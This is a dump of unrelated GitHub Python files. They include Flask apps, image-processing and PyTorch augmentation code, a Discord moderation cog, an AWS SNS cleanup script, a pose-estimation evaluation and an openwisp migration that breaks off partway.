第二种注册路由的方法,用基于类的视图(即插视图),一定要使用以下方式来注册\napp.add_url_rule('/hello', view_func=hello2)\n\nif __name__ == \"__main__\":\n # 生产环境,一般会用ngnix +uwsgi来部署\n '''\n 因为生产环境,一般会用ngnix +uwsgi来部署和启动项目\n 所以使用if __name__ == \"__main__\":的好处是:\n 生产环境不是手动执行该fisher文件,也就是说fisher在生产环境下不是入口文件了,\n 而只是被uwsgi加载的模块文件,使用的是uwsgi作为web服务器,\n 反过来说,如果没有这个语句,那么,在用uwsgi加载fisher这个模块后,app.run也会运行,\n 又启动了flask内置的服务器,同时出现俩服务器,这就不可以。\n 所以结论是,这个语句保证了生产环境下,不会运行flask自带的web服务器。\n '''\n\n # 修改代码自动重启服务器,在run()函数中把debug设置为True(使用的是配置文件注册进app的config的字典), 也可以用port=端口号来指定端口\n # app.config就是dict的子类\n app.run(host='0.0.0.0', debug=app.config['DEBUG'])\n\n\n","repo_name":"wnz27/fisher","sub_path":"learn_note/learn_flask_basic.py","file_name":"learn_flask_basic.py","file_ext":"py","file_size_in_byte":5310,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31385584358","text":"\"\"\"\n :filename transformations.py\n :author Tibor Kubik\n :email xkubik34@stud.fit.vutbr.cz\nfrom\n Classes of custom transformations that are applied during the training as additional augmentation of the depth maps.\n\"\"\"\n\nimport torch\nimport random\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom random import randrange\nfrom skimage.transform import resize, warp, AffineTransform\n\n\nclass Normalize(object):\n \"\"\"Normalization of a depth map in the value of [0, 1] for each pixel.\"\"\"\n def __init__(self, input_type):\n self.input_type = input_type\n\n def __call__(self, sample):\n\n if self.input_type == 'geom':\n image, landmarks, label = sample['image'], sample['landmarks'], sample['label']\n\n mean, std = image.mean([1, 2]), image.std([1, 2])\n\n # TODO?\n\n return {'image': image,\n 'landmarks': landmarks,\n 'label': label}\n\n\nclass ToTensor(object):\n \"\"\"Transformation of a training sample into a torch tensor instance.\"\"\"\n def __init__(self, input_type):\n self.input_type = input_type\n\n def __call__(self, sample):\n image, landmarks, label = sample['image'], sample['landmarks'], sample['label']\n\n image = torch.from_numpy(image.copy())\n\n if self.input_type != 'depth+geom':\n image = image.unsqueeze(1)\n image = image.permute(1, 0, 2)\n else:\n image = image.permute(2, 0, 1)\n\n landmarks = np.asarray(landmarks)\n landmarks = torch.from_numpy(landmarks.copy())\n\n return {'image': image,\n 'landmarks': landmarks,\n 'label': label}\n\n\nclass Resize(object):\n \"\"\"Resizing of the input sample into provided dimensions.\"\"\"\n\n def __init__(self, width, height, input_type='image'):\n assert isinstance(width, int)\n assert isinstance(height, int)\n\n self.width = width\n self.height = height\n self.type = input_type\n\n def __call__(self, sample):\n image, landmarks, label = sample['image'], sample['landmarks'], sample['label']\n resized_landmarks = landmarks.copy()\n\n if self.type == 'image':\n image = resize(image, (self.height, self.width), anti_aliasing=True)\n if self.type == 'landmarks':\n resized_landmarks = []\n for landmark in landmarks:\n landmark_resized = resize(landmark, (self.height, self.width), anti_aliasing=True)\n resized_landmarks.append(landmark_resized)\n\n return {'image': image,\n 'landmarks': resized_landmarks,\n 'label': label}\n\n\nclass RandomTranslating(object):\n \"\"\"Randomly translate the input sample from range [-10 px, 10 px] with provided probability.\"\"\"\n\n def __init__(self, p=0.5):\n assert isinstance(p, float)\n\n self.p = p\n\n def __call__(self, sample):\n image, landmarks, label = sample['image'], sample['landmarks'], sample['label']\n translated_landmarks = landmarks.copy()\n\n if np.random.rand(1) < self.p:\n n1 = randrange(-10, 10)\n n2 = randrange(-10, 10)\n\n t = AffineTransform(translation=(n1, n2))\n\n image = warp(image, t.inverse)\n\n translated_landmarks = []\n for landmark in landmarks:\n translated_landmarks.append(warp(landmark, t.inverse))\n\n return {'image': image,\n 'landmarks': translated_landmarks,\n 'label': label}\n\n\nclass RandomScaling(object):\n \"\"\"Randomly scales the input sample with scale index from range [0.90, 1.10] with provided probability.\"\"\"\n\n def __init__(self, p=0.5):\n assert isinstance(p, float)\n\n self.p = p\n\n def __call__(self, sample):\n image, landmarks, label = sample['image'], sample['landmarks'], sample['label']\n scaled_landmarks = landmarks.copy()\n\n if np.random.rand(1) < self.p:\n n = random.uniform(0.90, 1.10)\n t = AffineTransform(scale=(n, n))\n\n image = warp(image, t.inverse)\n\n scaled_landmarks = []\n for landmark in landmarks:\n scaled_landmarks.append(warp(landmark, t.inverse))\n\n return {'image': image,\n 'landmarks': scaled_landmarks,\n 'label': label}\n\n\nclass RandomRotation(object):\n \"\"\"Randomly rotates the input sample from range [−11.25 deg, 11.25 deg] with provided probability.\"\"\"\n\n def __init__(self, p=0.5):\n assert isinstance(p, float)\n\n self.p = p\n\n def __call__(self, sample):\n image, landmarks, label = sample['image'], sample['landmarks'], sample['label']\n\n rnd_num1 = randrange(-32, -6)\n rnd_num2 = randrange(6, 32)\n rnd_num = random.choice([rnd_num1, rnd_num2])\n\n if np.random.rand(1) < self.p:\n rotated_image = self.rotate(x=image.unsqueeze(0).type(torch.FloatTensor), theta=np.pi/rnd_num)\n\n rotated_landmarks = []\n for _, landmark in enumerate(landmarks):\n rotated_landmark = self.rotate(x=landmark.unsqueeze(0).unsqueeze(0).type(torch.FloatTensor), theta=np.pi/rnd_num)\n rotated_landmarks.append(rotated_landmark.squeeze(0))\n\n result = torch.cat(rotated_landmarks, dim=0)\n\n return {'image': rotated_image.squeeze(0),\n 'landmarks': result,\n 'label': label}\n\n return {'image': image,\n 'landmarks': landmarks,\n 'label': label}\n\n @staticmethod\n def get_rotation_matrix(theta):\n \"\"\"Returns a tensor rotation matrix with given theta value.\"\"\"\n\n theta = torch.tensor(theta)\n\n return torch.tensor([[torch.cos(theta), -torch.sin(theta), 0],\n [torch.sin(theta), torch.cos(theta), 0]])\n\n def rotate(self, x, theta):\n rot_mat = self.get_rotation_matrix(theta)[None, ...].repeat(x.shape[0], 1, 1)\n grid = F.affine_grid(rot_mat, x.size(), align_corners=False)\n x = F.grid_sample(x, grid, align_corners=False)\n\n return x\n","repo_name":"tiborkubik/Robust-Teeth-Detection-in-3D-Dental-Scans","sub_path":"src/trainer/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"14771404607","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue May 11 08:03:22 2021\r\n\r\n@author: AMK\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport cv2\r\nfrom matplotlib import pyplot as plt\r\nimport easygui\r\nImagePath=easygui.fileopenbox()\r\nimg = cv2.imread(ImagePath)\r\n\r\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n\r\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\r\nret, thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\r\n\r\n# noise removal\r\nkernel = np.ones((2,2),np.uint8)\r\n#opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\r\nclosing = cv2.morphologyEx(thresh,cv2.MORPH_CLOSE,kernel, iterations = 2)\r\n\r\n# sure background area\r\nsure_bg = cv2.dilate(closing,kernel,iterations=3)\r\n\r\n# Finding sure foreground area\r\ndist_transform = cv2.distanceTransform(sure_bg,cv2.DIST_L2,3)\r\n\r\n# Threshold\r\nret, sure_fg = cv2.threshold(dist_transform,0.1*dist_transform.max(),255,0)\r\n\r\n# Finding unknown region\r\nsure_fg = np.uint8(sure_fg)\r\nunknown = cv2.subtract(sure_bg,sure_fg)\r\n\r\n# Marker labelling\r\nret, markers = cv2.connectedComponents(sure_fg)\r\n\r\n# Add one to all labels so that sure background is not 0, but 1\r\nmarkers = markers+1\r\n\r\n# Now, mark the region of unknown with zero\r\nmarkers[unknown==255] = 0\r\n\r\nmarkers = cv2.watershed(img,markers)\r\nimg[markers == -1] = [0,0,0]\r\n\r\n\r\noriginalmage = cv2.imread(ImagePath)\r\noriginalmage = cv2.cvtColor(originalmage, cv2.COLOR_BGR2RGB)\r\n #print(image) # image is stored in form of numbers\r\n # confirm that image is chosen\r\ngaussian=cv2.GaussianBlur(originalmage,(5,5),0)\r\n#gaussian = cv2.resize(gaussian, (960, 540))\r\n\r\nReSized1 = cv2.resize(originalmage, (960, 540))\r\n#plt.imshow(ReSized1, cmap='gray')\r\ngrayScaleImage = cv2.cvtColor(originalmage, cv2.COLOR_BGR2GRAY)\r\nReSized2 = cv2.resize(grayScaleImage, (960, 540))\r\n#\r\nsmoothGrayScale = cv2.medianBlur(grayScaleImage, 5)\r\nReSized3 = cv2.resize(smoothGrayScale, (960, 540))\r\ngetEdge = cv2.adaptiveThreshold(smoothGrayScale, 255, \r\ncv2.ADAPTIVE_THRESH_MEAN_C, \r\ncv2.THRESH_BINARY, 9, 9)\r\nReSized4 = cv2.resize(getEdge, (960, 540))\r\n #plt.imshow(ReSized4, cmap='gray')\r\n #applying bilateral filter to remove noise \r\n #and keep edge sharp as required\r\ncolorImage = cv2.bilateralFilter(originalmage, 9, 300, 300)\r\n \r\nReSized5 = cv2.resize(colorImage, (960, 540))\r\n #plt.imshow(ReSized5, cmap='gray')\r\n #masking edged image with our \"BEAUTIFY\" image\r\n# cartoonImage = cv2.bitwise_and(colorImage, colorImage, mask=getEdge)\r\ncartoonImage = cv2.bitwise_and(gaussian,img, mask=getEdge)\r\nReSized6 = cv2.resize(cartoonImage, (960, 540))\r\n\r\n \r\nimages=[ReSized1, ReSized2, ReSized4, gaussian, markers ,ReSized6]# figsize=(6,9),\r\ntle=[\"Real Image\",\"GrayScale Image\",\"ThreshHold Image\",\"GaussianBlur\",\"Water Shed\",\"Cartoonyfy Image\"]\r\nfig, axes = plt.subplots(3,2, figsize=(8,8), subplot_kw={'xticks':[], 'yticks':[]}, gridspec_kw=dict(hspace=0.1, wspace=0.1))\r\nfor i, ax in enumerate(axes.flat):\r\n ax.set_title(tle[i])\r\n ax.imshow(images[i], cmap='gray')\r\n # save button code\r\n\r\nplt.show()","repo_name":"Muthukumar1303/DS-Projects","sub_path":"cartoonify image and video/whatershed.py","file_name":"whatershed.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11260292776","text":"import os\nfrom datetime import datetime\n\nfrom flask import Flask, render_template, request, url_for, flash\nfrom dotenv import load_dotenv\n\nload_dotenv()\nSECRET_KEY = os.getenv('SECRET_KEY')\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = SECRET_KEY\n\n\n@app.route(\"/\")\ndef index():\n context = {\n 'title': 'Калькулятор'\n }\n return render_template('index.html', context=context)\n\n\n@app.route(\"/result\", methods=['POST', 'GET'])\ndef result():\n def num_sum(num):\n num = int(num)\n if num > 27:\n return num_sum(sum(map(int, list(str(num)))))\n return num\n\n if request.method == 'POST':\n day = request.form['day']\n month = request.form['month']\n year = request.form['year']\n\n birthday = f'{day}.{month}.{year}'\n\n name = request.form['name']\n\n if not day.isdigit():\n flash(\"Поле День должно содержать только цифры\")\n else:\n if int(day) > 31:\n flash(\"Дней не может быть больше 31\")\n context = {\n 'title': 'Матрица личностей',\n }\n return render_template('index.html', context=context)\n\n if not month.isdigit():\n flash(\"Поле Месяц должно содержать только цифры\")\n else:\n if int(month) > 12:\n flash(\"Месяцев не может быть больше 12\")\n context = {\n 'title': 'Матрица личностей',\n }\n return render_template('index.html', context=context)\n\n if not year.isdigit():\n flash(\"Поле Год должно содержать только цифры\")\n else:\n if 1900 > int(year) or int(year) > datetime.now().year:\n flash(f\"Год должен быть в диапазоне от 1900 до {datetime.now().year}\")\n context = {\n 'title': 'Матрица личностей',\n }\n return render_template('index.html', context=context)\n\n if day.isdigit() and month.isdigit() and year.isdigit():\n month = num_sum(month) # первый сверху\n day = num_sum(day) # первый слева\n year = num_sum(year) # первый справа\n\n f_1 = num_sum((day + month + year)) # Первый снизу\n f_2 = num_sum((f_1 + day + month + year)) # центр\n\n f_3 = num_sum((day + f_2)) # третий слева\n f_4 = num_sum((day + f_3)) # второй слева\n\n f_5 = num_sum((month + f_2)) # третий сверху\n f_6 = num_sum((month + f_5)) # второй сверху\n\n f_7 = num_sum((year + f_2)) # третий справа\n f_8 = num_sum((year + f_7)) # второй справа\n\n f_9 = num_sum((f_1 + f_2)) # третий снизу\n f_10 = num_sum((f_1 + f_9)) # второй снизу\n\n f_11 = num_sum((f_7 + f_9)) # четвертый правый-низ\n f_12 = num_sum((f_11 + f_9)) # love\n f_13 = num_sum((f_7 + f_11)) # money\n\n f_14 = num_sum((day + f_1)) # первый левый-низ\n f_18 = num_sum((f_2 + f_14)) # третий левый-низ\n f_19 = num_sum((f_18 + f_14)) # второй левый-низ\n\n f_15 = num_sum((year + f_1)) # первый правый-низ\n f_20 = num_sum((f_2 + f_15)) # третий правый-низ\n f_21 = num_sum((f_20 + f_15)) # второй правый-низ\n\n f_16 = num_sum((year + month)) # первый правый-верх\n f_22 = num_sum((f_2 + f_16)) # третий правый-верх\n f_23 = num_sum((f_22 + f_16)) # второй правый-верх\n\n f_17 = num_sum((day + month)) # первый левый-верх\n f_24 = num_sum((f_2 + f_17)) # третий левый-верх\n f_25 = num_sum((f_24 + f_17)) # второй левый-верх\n\n #####################################################\n\n s_1 = num_sum((f_24 + f_22 + f_20 + f_18)) # 4 низ\n s_2 = num_sum((f_25 + f_23 + f_21 + f_19)) # 3 низ\n s_3 = num_sum((f_17 + f_16 + f_15 + f_14)) # 2 низ\n s_4 = num_sum((f_24 + f_20)) # правый низ от центра\n s_5 = num_sum((f_22 + f_18)) # левый низ от центра\n\n context = {\n 'title': 'Матрица личностей',\n 'birthday': birthday,\n 'name': name,\n 'year': year,\n 'day': day,\n 'month': month,\n 'f_1': f_1,\n 'f_2': f_2,\n 'f_3': f_3,\n 'f_4': f_4,\n 'f_5': f_5,\n 'f_6': f_6,\n 'f_7': f_7,\n 'f_8': f_8,\n 'f_9': f_9,\n 'f_10': f_10,\n 'f_11': f_11,\n 'f_12': f_12,\n 'f_13': f_13,\n 'f_14': f_14,\n 'f_15': f_15,\n 'f_16': f_16,\n 'f_17': f_17,\n 'f_18': f_18,\n 'f_19': f_19,\n 'f_20': f_20,\n 'f_21': f_21,\n 'f_22': f_22,\n 'f_23': f_23,\n 'f_24': f_24,\n 'f_25': f_25,\n 's_1': s_1,\n 's_2': s_2,\n 's_3': s_3,\n 's_4': s_4,\n 's_5': s_5,\n }\n return render_template('result.html', context=context)\n\n context = {\n 'title': 'Матрица личностей',\n }\n return render_template('index.html', context=context)\n\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"LMSerhii/flask","sub_path":"my_flask_project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6066,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74705412963","text":"#!/usr/bin/env python\n\n\"\"\"The setup script.\"\"\"\n\nfrom setuptools import setup, find_packages\n\nwith open('README.rst') as readme_file:\n readme = readme_file.read()\n\nwith open('HISTORY.rst') as history_file:\n history = history_file.read()\n\nwith open('requirements.txt') as f:\n requirements = f.readlines()\n\ntest_requirements = ['pytest>=3', ]\n\nsetup(\n author=\"Smruti Sahoo\",\n author_email='ssahoo@mobiquityinc.com',\n python_requires='>=3.6',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n ],\n description=\"Terragrunt wrapper for AWS infra deployment\",\n entry_points={\n 'console_scripts': [\n 'tgwrapper=tgwrapper.tgwrapper:main',\n ],\n },\n install_requires=requirements,\n license=\"MIT license\",\n long_description=readme + '\\n\\n' + history,\n include_package_data=True,\n keywords='tgwrapper',\n name='tgwrapper',\n packages=find_packages(include=['tgwrapper', 'tgwrapper.*']),\n test_suite='tests',\n tests_require=test_requirements,\n url='https://github.com/smruti-21/tgwrapper',\n version='0.1.1',\n zip_safe=False,\n)\n","repo_name":"asksmruti/mob-terragrunt-wrapper","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70925301604","text":"# Удаление пользователей указаной роли\nimport nextcord\nfrom nextcord import Interaction\nfrom nextcord.ext import commands, ipc\nfrom nextcord.utils import get\n\nclass DeleteMembersByRole(commands.Cog):\n server_id = None\n\n def __init__(self, client):\n self.client = client\n self.server_id = client.server_id\n\n @nextcord.slash_command(name=\"delete_members_by_role\", description=\"Delete all members attached to chosen role\",\n guild_ids=[server_id])\n @commands.has_permissions(administrator=True)\n async def self(self, interaction: Interaction, role: str):\n members = []\n for member in interaction.guild.members:\n if get(interaction.guild.roles, name=role) in member.roles:\n members.append(await member.kick())\n await interaction.response.send_message(f\"{interaction.user}, u have kicked '{len(members)}' members\",\n ephemeral=True, delete_after=3.0)\n\ndef setup(client):\n client.add_cog(DeleteMembersByRole(client))\n","repo_name":"moevm/bsc_ryzhih","sub_path":"discord_bot/cogs/delete_members_by_role.py","file_name":"delete_members_by_role.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22195452130","text":"import itertools\nimport typing\n\n\nclass Display(typing.NamedTuple):\n signals: tuple[str, ...]\n output: tuple[str, ...]\n\n\ndef find_digits(display: Display) -> int:\n values = {3: \"7\", 2: \"1\", 7: \"8\", 4: \"4\"}\n return sum(1 for out in display.output if values.get(len(out)))\n\n\ndef calculate_display_digits(display: Display) -> dict[int, str]:\n length_to_number = {3: 7, 2: 1, 7: 8, 4: 4}\n\n digits: dict[int, str] = {}\n groupings = {}\n\n sorted_signals = sorted(display.signals, key=len)\n for key, group in itertools.groupby(sorted_signals, key=len):\n if key in length_to_number:\n digits[length_to_number[key]] = next(group)\n else:\n groupings[key] = [v for v in group]\n\n digits[2] = [signal for signal in groupings[5] if len(set(digits[4]).difference(set(signal))) == 2][0]\n groupings[5].remove(digits[2])\n\n digits[3] = [signal for signal in groupings[5] if len(set(digits[2]).difference(set(signal))) == 1][0]\n groupings[5].remove(digits[3])\n digits[5] = groupings[5][0]\n\n digits[0] = [signal for signal in groupings[6] if len(set(digits[5]).difference(set(signal))) == 1][0]\n groupings[6].remove(digits[0])\n\n digits[9] = [signal for signal in groupings[6] if len(set(digits[3]).difference(set(signal))) == 0][0]\n groupings[6].remove(digits[9])\n digits[6] = groupings[6][0]\n\n return digits\n\n\ndef solve_output_with_digits(display: Display, digits_mapping: dict[int, str]) -> int:\n code_to_digit = {str(sorted(v)): k for k, v in digits_mapping.items()}\n return sum(\n [code_to_digit[str(sorted(output))] * position for output, position in zip(display.output, (1000, 100, 10, 1))]\n )\n\n\nif __name__ == \"__main__\":\n with open(\"./input.txt\") as f:\n entries = [line.strip().split(\"|\") for line in f.readlines()]\n\n displays = [Display(tuple(entry[0].strip().split(\" \")), tuple(entry[1].strip().split(\" \"))) for entry in entries]\n\n print(f\"Part One: {sum(find_digits(display) for display in displays)}\")\n print(\n f\"Part Two: {sum(solve_output_with_digits(display, calculate_display_digits(display)) for display in displays)}\"\n )\n","repo_name":"Mathew/advent-of-code-2021","sub_path":"pydays/day8/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1547889072","text":"class Flower:\n def __init__(self):\n self.__flower_name=None\n self.__price_per_kg=None\n self.__stock_available=None\n \n def validate_flower(self):\n self.__flower_name=self.__flower_name.lower()\n if(self.__flower_name==\"orchid\" or self.__flower_name==\"rose\" or self.__flower_name==\"jasmine\"):\n return True\n else:\n return False\n \n def validate_stock(self,required_quantity):\n if required_quantity<=self.__stock_available:\n return True\n else:\n return False\n \n def sell_flower(self,required_quantity):\n if (self.validate_flower()):\n if(self.validate_stock(required_quantity)==True):\n self.__stock_available-=required_quantity\n \n def check_level(self):\n if self.__flower_name.lower()==\"orchid\":\n if self.__stock_available>=15:\n return False\n else:\n return True\n elif self.__flower_name.lower()==\"rose\":\n if self.__stock_available>=25:\n return False\n else:\n return True\n elif self.__flower_name.lower()==\"jasmine\":\n if self.__stock_available>=40:\n return False\n else:\n return True\n else:\n return False\n \n def get_stock_available(self):\n return self.__stock_available\n \n def set_stock_available(self,stock_available):\n self.__stock_available=stock_available\n \n def get_price_per_kg(self):\n return self.__price_per_kg\n \n def set_price_per_kg(self, price_per_kg):\n self.__price_per_kg==price_per_kg\n \n def get_flower_name(self):\n return self.__flower_name\n \n def set_flower_name(self, flower_name):\n self.__flower_name=flower_name\n \nflorist=Flower()\nflorist.set_flower_name(\"ROse\")\nflorist.set_price_per_kg(200)\nflorist.set_stock_available(27)\nflorist.validate_stock(4)\nflorist.sell_flower(4)\nprint(florist.check_level())\n","repo_name":"Pyk017/Python","sub_path":"OOPS/Day2/Assignment11.py","file_name":"Assignment11.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"30702953911","text":"'''\n@Author: Matheus Barros\nDate: 03/09/2021\n\n'''\nimport boto3\nimport os\n\n#CREATING CLIENT CONNECTION\nAWS_KEY_ID = os.environ['AWS_KEY_ID']\nAWS_SECRET = os.environ['AWS_SECRET']\n\nsns = boto3.client('sns',\n\t\t\t\t\tregion_name='us-east-1',\n\t\t\t\t\taws_access_key_id=AWS_KEY_ID,\n\t\t\t\t\taws_secret_access_key=AWS_SECRET)\n\nresponse = sns.list_topics()['Topics']\n\n#DELETING ALL TOPICS\nfor topic in response:\n\tprint('Deteleting topic ===> ' + topic['TopicArn'])\n\tsns.delete_topic(TopicArn= topic['TopicArn'])\n","repo_name":"Matheus-Barros/Amazon_AWS","sub_path":"Deleting SNS Topics/DeleteTopic.py","file_name":"DeleteTopic.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"26639894427","text":"# -*- coding: utf-8 -*-\n# IMPORT\nimport os\nimport utils\nimport warnings\nfrom itertools import groupby\nfrom PIL import Image\nwarnings.simplefilter(\"ignore\", FutureWarning)\n\n# COSTANTI\nCSV_PATH = './results'\nMODELS = ['RT','I','II','III','IV']\nFRAMEWORK = 'pytorch'\nMODEL = MODELS[0]\nJOINT_ID = {0:\"right_ankle\", 1:\"right_knee\", 2:\"right_hip\", 3:\"left_hip\",\n 4:\"left_knee\", 5:\"left_ankle\", 6:\"pelvis\", 7:\"thorax\",\n 8:\"upper_neck\", 9:\"head_top\", 10:\"right_wrist\", 11:\"right_elbow\", \n 12:\"right_shoulder\", 13:\"left_shoulder\", 14:\"left_elbow\", 15: \"left_wrist\"}\nJOINT_ID_LSP = {0:\"right_ankle\", 1:\"right_knee\", 2:\"right_hip\", 3:\"left_hip\",\n 4:\"left_knee\", 5:\"left_ankle\", 6:\"right_wrist\", 7:\"right_elbow\",\n 8:\"right_shoulder\", 9:\"left_shoulder\", 10:\"left_elbow\",\n 11:\"left_wrist\", 12:\"neck\", 13:\"head_top\"}\n\n# VARIABILI\n# True lavora su un solo modello (MODEL), False crea un plot che compara i diversi modelli\nANALYZE_ONE_MODEL = False\n\n# FUNZIONI\ndef get_rows_from_csv(list_of_file, abs_ds_path, model):\n res = {}\n for file in list_of_file:\n with open(f'{abs_ds_path}/{model}/{file.split(\".\")[0]}_coordinates.csv', 'r') as fin:\n header = fin.readline().strip()\n header = header.replace(\"_x\", \":x\")\n header = header.replace(\"_y\", \":y\")\n\n if FRAMEWORK != 'pytorch':\n fin.readline() # riga vuota\n \n value = fin.readline().strip()\n body_parts = list(zip(header.split(\",\"), value.split(\",\")))\n body_parts.sort(key=lambda x: x[0])\n parts = {}\n for p in [list(i) for j, i in groupby(body_parts, lambda x: x[0].split(':')[0])]:\n # p = [[parte_corpo_x, val_x], [parte_corpo_y, val_y]]\n parts[p[0][0].split(\":\")[0]] = (p[0][1], p[1][1])\n res[file] = parts\n return res\n\ndef get_real_body_parts(inference, abs_ds_path):\n for img in inference:\n image = Image.open(f'{abs_ds_path}/{img}')\n width = image.width\n height = image.height\n\n for bp in inference[img]:\n new_x = float(inference[img][bp][0]) * width\n new_y = float(inference[img][bp][1]) * height\n inference[img][bp] = (round(new_x), round(new_y))\n \n # upper-neck!=thorax E QUINDI neck=punto medio tra upper-neck e thorax\n inference[img]['neck'] = (round((inference[img][JOINT_ID[7]][0]+inference[img][JOINT_ID[8]][0]) / 2),\n round((inference[img][JOINT_ID[7]][1]+inference[img][JOINT_ID[8]][1]) / 2))\n # TODO: pelvis = punto medio tra le anche? 1/9 E 0/9 CON RT\n \n return inference\n\ndef get_inference(list_of_img, abs_ds_path, model):\n inference = get_rows_from_csv(list_of_img, abs_ds_path, model)\n return get_real_body_parts(inference, abs_ds_path)\n\n# LSP - http://sam.johnson.io/research/lsp.html\ndef load_LSP():\n mat = utils.load_mat('./joints.mat')\n joints = mat['joints'] # 3x14x2000\n \n annotations = {}\n for img in range(joints.shape[2]): # 2000 immagini\n ann = {}\n for kp in range(joints.shape[1]): # 14 keypoint\n #Right ankle,Right knee,Right hip,Left hip,Left knee,Left ankle,Right wrist,\n #Right elbow,Right shoulder,Left shoulder,Left elbow,Left wrist,Neck,Head top\n ann[JOINT_ID_LSP[kp]] = (round(joints[0][kp][img]), round(joints[1][kp][img]))\n \n # pelvis=punto medio tra le anche\n ann[\"pelvis\"] = (round((ann[JOINT_ID_LSP[2]][0]+ann[JOINT_ID_LSP[3]][0]) / 2),\n round((ann[JOINT_ID_LSP[2]][1]+ann[JOINT_ID_LSP[3]][1]) / 2))\n \n annotations[f'im{(img+1):04}.jpg'] = ann\n \n return annotations\n\ndef main_LSP():\n # path assoluto della cartella CSV_PATH\n abs_ds_path = os.path.abspath(CSV_PATH)\n \n # lista con i nomi delle immagini per get_inference\n images = [ f for f in os.listdir(abs_ds_path) if os.path.isfile(os.path.join(abs_ds_path,f)) ]\n\n # ground truth\n annotations = load_LSP()\n ground_truth = {}\n for name in images:\n ground_truth[name] = annotations[name]\n\n if ANALYZE_ONE_MODEL:\n inference = get_inference(images, abs_ds_path, MODEL)\n \n # PCP totale e per Torso?,Upper Leg,Lower Leg,Upper Arm,Forearm,Head\n print(\"PCP:\", utils.pcp(ground_truth, inference))\n pcp_values = utils.auc(utils.pcp, ground_truth, inference)\n print(\"AUC per PCP: \", pcp_values[2])\n print()\n \n print(\"PDJ:\", utils.pdj(ground_truth, inference))\n pdj_values = utils.auc(utils.pdj, ground_truth, inference)\n print(\"AUC per PDJ: \", pdj_values[2])\n print()\n \n # PCK con d=torso (PER PELVIS?)\n print(\"PCK:\", utils.pck(ground_truth, inference))\n pck_values = utils.auc(utils.pck, ground_truth, inference)\n print(\"AUC per PCK: \", pck_values[2])\n print()\n \n # grafici comparativi\n utils.plot(utils.pcp, {MODEL: pcp_values})\n utils.plot(utils.pdj, {MODEL: pdj_values})\n utils.plot(utils.pck, {MODEL: pck_values})\n\n else:\n pcps = {}\n pdjs = {}\n pcks = {}\n for m in MODELS:\n inference = get_inference(images, abs_ds_path, m)\n \n pcp_values = utils.auc(utils.pcp, ground_truth, inference)\n pcps[m] = pcp_values\n \n pdj_values = utils.auc(utils.pdj, ground_truth, inference)\n pdjs[m] = pdj_values\n \n pck_values = utils.auc(utils.pck, ground_truth, inference)\n pcks[m] = pck_values\n \n print(\"Modello \"+m)\n print(\"AUC per PCP: \", pcp_values[2])\n print(\"AUC per PDJ: \", pdj_values[2])\n print(\"AUC per PCK: \", pck_values[2])\n print()\n\n # grafici comparativi\n utils.plot(utils.pcp, pcps)\n utils.plot(utils.pdj, pdjs)\n utils.plot(utils.pck, pcks)\n\n\nif __name__ == \"__main__\":\n main_LSP()\n","repo_name":"zampierida98/deep-learning","sub_path":"progetto-DL/LSP/analisi_lsp_davide.py","file_name":"analisi_lsp_davide.py","file_ext":"py","file_size_in_byte":6074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29209925895","text":"import swapper\nfrom django.db import migrations\n\nfrom openwisp_monitoring.check.settings import AUTO_CONFIG_CHECK, AUTO_PING\nfrom openwisp_monitoring.check.tasks import auto_create_config_check, auto_create_ping\n\n\ndef create_ping_checks(apps, schema_editor):\n if AUTO_PING:\n ContentType = apps.get_model('contenttypes', 'ContentType')\n Check = apps.get_model('check', 'Check')\n Device = apps.get_model('config', 'Device')\n for device in Device.objects.all():\n auto_create_ping(\n model=Device.__name__.lower(),\n app_label=Device._meta.app_label,\n object_id=str(device.pk),\n check_model=Check,\n content_type_model=ContentType,\n )\n\n\ndef create_config_applied_checks(apps, schema_editor):\n if not AUTO_CONFIG_CHECK:\n return\n ContentType = apps.get_model('contenttypes', 'ContentType')\n Check = apps.get_model('check', 'Check')\n Device = apps.get_model('config', 'Device')\n for device in Device.objects.all():\n auto_create_config_check(\n model=Device.__name__.lower(),\n app_label=Device._meta.app_label,\n object_id=str(device.pk),\n check_model=Check,\n content_type_model=ContentType,\n )\n\n\ndef remove_config_applied_checks(apps, schema_editor):\n Check = apps.get_model('check', 'Check')\n Metric = apps.get_model('monitoring', 'Metric')\n Check.objects.filter(\n check='openwisp_monitoring.check.classes.ConfigApplied'\n ).delete()\n 